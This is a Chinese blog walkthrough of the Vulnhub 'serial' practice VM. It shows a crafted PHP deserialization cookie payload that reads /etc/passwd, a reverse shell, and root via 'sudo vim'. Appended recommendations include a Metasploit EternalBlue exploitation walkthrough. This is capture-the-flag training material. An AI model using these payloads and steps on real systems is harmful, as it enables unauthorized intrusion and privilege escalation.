Vulnhubserial靶机复现

Linux靶机渗透实验全过程
最新推荐文章于 2025-11-25 13:33:45 发布
原创 最新推荐文章于 2025-11-25 13:33:45 发布 · 705 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #linux #运维

先下载靶机:https://download.vulnhub.com/serial/serial.zip

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.13.1-254

根据对比可知serial的一个ip地址为192.168.13.141
该靶机开启了22端口和80端口

目录扫描

dirb http://192.168.13.141

发现一个可访问网站,尝试访问一下

发现一个zip文件
下载看看

对该zip压缩包进行一个解压

解压出3份php文件,看看内容

index.php文件中包含user.class.php文件且对cookie中的user参数进行了序列化和base64编码

log.class.php定义了Log类和成员变量type_log且handler函数对变量进行了文件包含和输出

user.class.php文件包含log.class.php文件且定义了Welcome和User两个类并调用了log.class.php文件中的handler函数

访问原网站,用Burpsuite抓包查看cookie

由刚才三个文件可知这是base64编码

得到O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}7

构造payload,尝试读取passwd文件

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

使用base64编码将Burp抓的包发送到repeater模块修改cookie,得到passwd可知可登录系统用户除了root,还有sk4

获取shell
在本地构造一个payload

写入到一个php文件中

访问1.php文件

获得一个base64编码

更换抓包的cookie进行测试

命令执行成功

在Kali开启一个监听

反弹shell

没有回应,但反弹成功

提权

查看系统版本,内核版本

四处翻翻

在根目录下找到一个txt.bak文件

查看

获得了sk4的登录账号和密码
因为之前扫出来有22端口开放

使用远程连接

登陆成功

提权
sudo vim -c ':!/bin/sh'

提权成功

cjchsh
关注
反序列化靶机serial复现
muyuchen110的博客
08-01 863
【代码】反序列化靶机serial复现
decoy靶机复现
weixin_52956666的博客
08-19 862
使用root用户,运行0.49版本的chkrootkit程序,也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246,或者使用程序honeypot.decoy的功能5 Launch an AV Scan.,或者甚至什么也不做,来调用root用户运行0.49版本的chkrootkit程序。pspy是Linux系统的进程监控工具,可以记录进程的运行情况,包括启动进程的命令,一定程度上类似于详细版的history命令。当用户为root用户,运行0.49版本的chkrootkit程序。
serial复现
weixin_61982677的博客
10-08 423
user.class.php文件包含了log.class.php,并定义了两个类,分别是Welcome和User,User这个类中有$this->wel = new Welcome();,再看Welcome类中发现调用了handler()函数,接下来看log.class.php文件。index.php文件中包含了user.class.php文件,并对cookie中的user参数进行了判断,若user参数不存在则添加并进行了base64编码再进行序列化;发现一个目录,有一个压缩包文件,点击下载。
反序列化靶机serial漏洞复现 超详细教程
qq_48368964的博客
08-01 942
漏洞环境:https://www.vulnhub.com/entry/serial-1,349/ 下载后使用Vmware打开创建新的虚拟机: 选择客户机版本为Ubuntu 64位: 一直下一步,知道选择使用现有磁盘: 选择下载的vmdk磁盘文件: 开机,环境配置完成: 访问下web 抓一下包发到重放器中看看 发现 cook 是被加密的解码网址:Base64 在线编码解码 | Base64 加密解密 - Base64.us下载下来三个文件 index.php: user.class.php:
BlackMarket靶机复现
weixin_52956666的博客
08-07 1458
因为squirrelmail是web邮箱应用,存在 CVE-2017-7692 远程代码执行漏洞,但是得有一个用户可以登陆进去。因为 内核版本是4.4.0-31-generic,可以进行脏牛 CVE-2016-5195 提权。并且发现一句话Jason Bourne Email access?抓包,去查看,发现存在id值,这里先尝试改为1,因为大部分高权限用户都是1。尝试squirrelmail,squirrelmail。进入后发现没东西,一点发现有个隐藏的输入框。
Tomato靶机复现过程
weixin_67729650的博客
08-04 2341
这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了,那不就拿下了?紧接着我们可以试试我们学过的文件包含的漏洞知识,去试试。
liceo靶机复现
m0_72372037的博客
04-30 630
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Liceo本机环境:NAT模式下,使用VirtualBox。
WebDeveloper靶机复现
weixin_52956666的博客
08-12 434
cd /var/www/html/ ,查看 wp-config.php 文件。在wireshark里面查看,发现wordpress的账户密码。密码:Te5eQg&4sBS!靶机ip为192.168.112.137。sudo -l查看发现没有免密操作。账号:webdeveloper。账号:webdeveloper。使用kali反弹shell。改成kali的ip进行监听。sudo -l查看免密操作。发现可以文件上传的地方。发现了数据库的账号密码。getshell成功。
精选资源
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
精选资源
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
三台服务器,一套流水线:如何实现无缝自动化部署?
小安同学的博客
11-23 916
GitLab是一款开源DevOps平台,提供代码托管、CI/CD等全流程解决方案。摘要介绍了两种安装方式:1)基于Linux系统,通过Yum安装依赖和GitLab包,配置防火墙和端口;2)基于Docker环境,通过容器部署并配置数据卷挂载。文章还涵盖了GitLab的基本使用,包括创建组/项目、用户权限管理、代码提交,以及与Jenkins的集成方法。Jenkins部分详细说明了Docker部署流程、目录挂载和端口配置,并介绍了如何配置GitLab项目集成和权限管理。
IPV6公网暴露下的OPENWRT防火墙安全设置(只允许访问局域网中指定服务器指定端口其余拒绝)
2509_94004128的博客
11-24 424
则只需要匹配最后一段)**如何选择主机号后缀?**在查询出的多个地址中必须选择你DDNS做同步的那个ipv6地址的后缀。注意!你的IPV6必须为EUI64生成这样主机位不会变动。如果是stable-privacy生成则会每次生成不同的后缀,虽然有利于安全性,但是并不适用于防火墙规则编写。可以按照以下教程修改。如果你不想修改,每次的地址都完全随机难以匹配,因此目的地址栏只能空着,仅依靠目标端口实现限制。(指定主机:端口 变为 所有主机:端口)
LoRaWAN网关:连接私有服务器是“可行”还是“明智”?
weixin_54259908的博客
11-23 353
在物联网(IoT)快速发展的今天,LoRaWAN凭借其远距离、低功耗的特性,成为连接海量终端设备的热门通信协议之一。随着越来越多的企业和开发者开始构建自己的物联网网络,一个常见的技术疑问也随之而来: LoRaWAN网关能否连接到自建的私有服务器,使用自研的通信协议?
服务器数据恢复】物流企业WMS系统硬盘固件损坏导致库存数据丢失数据恢复案例 - 金海境科技
SuperVault的博客
11-23 571
服务器数据恢复,勒索病毒解密恢复,虚拟化数据恢复,数据库修复数据恢复,VMWare数据恢复,分布式数据恢复,vSAN数据恢复,存储数据恢复,数据恢复
香港服务器流量有限制和带宽有限制区别在哪?
SonderCloud_的博客
11-24 559
在选择香港服务器时,“流量限制” 与 “带宽限制” 是最易混淆的两个概念,尤其面对 “带宽不限 + 流量限制”“流量不限 + 带宽限制” 两种组合时,很多用户会选错计费模式,导致要么流量超额付费,要么带宽不足影响体验。本文从定义、计费模式、适用场景三个维度,拆解两者的核心区别,帮你避开选型陷阱。服务器与网络之间的数据传输速率,即单位时间内可传输的数据量,决定访问速度快慢。一定时间内(通常是每月)服务器传输的数据总量,管包括上传和下载的数据总和。
服务器无故nginx异常关闭之kauditd0 kswapd0挖矿病毒 CPU占用200% 内存耗尽
最新发布
2509_94177031的博客
11-25 437
当我用 命令 kill -9 kaudiod0 杀死进程后,没过一会儿,进程又自动开起来了。发现8G的内存快被占用光了,而我们只开了一个开销不大的java服务,按道理1G就够了。网上搜索教程上是kswapd0,而此次我们服务器上是 kswapd00。,这可能意味着原始启动它的进程或会话已经结束,但该进程仍然在运行。的 systemd 服务单元中运行的,该服务单元是为用户。发现有个kauditd0进程占用了200% 的CPU。的会话 189 创建的。发现有各种德国 美国的IP,因此可以确认是中毒了。
【解决】RESP.app GUI for Redis 连接不上redis服务器
2509_94189991的博客
11-25 323
可以使用 firewall-cmd --zone=public --list-ports 查询开放了哪些防火墙端口。会出现 6379/tcp ,此时再使用RESP GUI去连接redis就可以了。重启redis:systemctl restart redis.service。服务器端口号没有开放,或者使用宝塔,redis的6379端口号没设置。比如我的redis是使用6379端口。需要添加6379端口号在服务器安全组内添加和宝塔的安全设置中添加。ip正确,端口号也正确,redis服务也开启,但就是不成功。
WisdomSSH如何高效检查服务器状态并生成运维报告
qinyia的博客
11-24 437
内存方面,总容量1.9GiB,仅使用187MiB,剩余可用空间达1.6GiB,且未启用交换分区,说明内存管理良好。近期,我借助WisdomSSH工具,实现了从命令执行到状态分析的无缝协作,显著提升了排查效率。执行后,WisdomSSH返回了结构化输出,包括系统运行时间、实时负载平均值、前10个进程的资源占用情况、内存与交换空间使用详情,以及各挂载点的磁盘容量与使用率。对于追求效率与准确性的运维人员而言,合理利用智能工具,能有效释放精力,专注于更高阶的架构优化与风险预防工作。
C++高性能网络服务器与epoll实战分享:大规模并发连接处理与事件驱动优化经验
2501_94162332的博客
11-23 385
epoll + 多线程架构保证高并发处理能力对象池与非阻塞 I/O降低内存和 CPU 开销批量读写与协议优化提升网络效率连接管理与负载均衡保持系统稳定监控与告警快速发现性能瓶颈C++ 结合 epoll,通过高性能事件驱动设计、对象池复用和监控告警,为在线游戏和大规模实时系统提供了稳定、高效且可扩展的网络解决方案。
msf复现永恒之蓝靶机搭建
07-12
### 环境搭建与配置 为了成功复现 EternalBlue 漏洞,首先需要准备好实验环境。靶机选择 **Windows 7** 系统,IP 地址为 `192.168.244.133`;攻击机使用 **Kali Linux**,IP 地址为 `192.168.244.136`。所需工具包括 `nmap` 和 `metasploit-framework (MSF)`,这些工具默认集成在 Kali 系统中[^1]。 #### 靶机准备 - 安装 Windows 7 系统,并确保未安装补丁 KB4012598(该补丁修复了 MS17-010 漏洞)。 - 关闭防火墙或允许 SMB 协议通过。 - 确保系统开启了文件共享功能,SMB 服务运行正常。 #### 攻击机准备 - 安装 Kali Linux 并更新系统。 - 安装 Metasploit Framework,可通过命令 `sudo apt install metasploit-framework` 进行安装。 - 确认 nmap 已安装,用于网络扫描和端口探测。 ### 使用 Metasploit 复现 EternalBlue 漏洞 #### 启动 Metasploit Framework 打开终端并输入以下命令启动 Metasploit: ```bash msfconsole ``` 进入 Metasploit 控制台后,输出信息显示当前版本及模块数量,如下所示: ``` =[ metasploit v6.3.27-dev ] + -- --=[ 2335 exploits - 1220 auxiliary - 413 post ] + -- --=[ 1385 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] ``` #### 搜索 EternalBlue 模块 在 Metasploit 控制台中执行以下命令搜索相关模块: ```bash search eternalblue ``` 系统将列出多个与 EternalBlue 相关的模块,例如 `exploit/windows/smb/ms17_010_eternalblue`。选择该模块进行漏洞利用: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` #### 设置目标与负载 查看模块所需的参数: ```bash show options ``` 主要需要设置以下参数: - `RHOSTS`: 靶机 IP 地址,即 `192.168.244.133` - `LHOST`: 攻击机 IP 地址,即 `192.168.244.136` 设置参数命令如下: ```bash set RHOSTS 192.168.244.133 set LHOST 192.168.244.136 ``` 默认情况下,模块会使用合适的 payload,如 `windows/x64/meterpreter/reverse_tcp`。若需更改 payload,可使用 `set payload` 命令指定。 #### 执行漏洞利用 完成所有设置后,执行漏洞利用: ```bash exploit ``` 如果一切顺利,Metasploit 将尝试连接靶机并通过 SMB 协议发送恶意数据包,最终获得 Meterpreter 会话。 #### 成功获取 Meterpreter 会话 一旦漏洞利用成功,控制台将显示 Meterpreter 提示符,表示已成功获取目标系统的控制权。此时可以执行多种操作,如上传文件、执行命令等。 ```bash meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 上述结果显示当前权限为 `NT AUTHORITY\SYSTEM`,即最高权限,说明漏洞利用成功。 ### 注意事项与防御建议 - **测试环境隔离**:确保实验环境与生产网络隔离,避免误伤真实系统。 - **漏洞修复**:微软已于 2017 年发布补丁 KB4012598 修复此漏洞。对于实际环境中未打补丁的系统,应尽快安装官方补丁。 - **SMB 协议防护**:企业网络中应限制 SMB 协议的外部访问,关闭不必要的共享服务,启用防火墙规则阻止非法 SMB 请求。 - **入侵检测**:部署 IDS/IPS 系统,监控异常 SMB 流量,及时发现类似 EternalBlue 的攻击行为。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值